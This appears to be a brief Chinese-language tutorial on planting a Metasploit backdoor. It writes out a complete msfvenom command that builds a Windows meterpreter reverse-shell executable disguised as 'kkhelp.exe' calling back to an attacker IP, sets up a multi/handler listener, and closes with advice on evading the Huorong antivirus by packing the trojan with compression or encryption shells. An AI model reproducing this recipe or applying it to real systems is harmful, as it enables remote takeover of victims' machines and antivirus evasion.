Msf后门植入木马监听

拿到权限之后
放到后台运行:background



以下命令生成远程可控后门。
Payload 是攻击机IP 192.168.137.140
1
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.137.140 lport=9999 -f exe -o kkhelp.exe

此时看到桌面生成 木马文件,那么改如何上钩呢,这里我就自己主动当诱饵

使用模块
使用模块 use exploit/multi/handler 进行监听


这里我输错了了好几次,一定细心。


成功

免杀
以上生成的计算机直接给我杀掉了,以过火绒为例,不会百分百成功偶;可以加壳:压缩壳,加密壳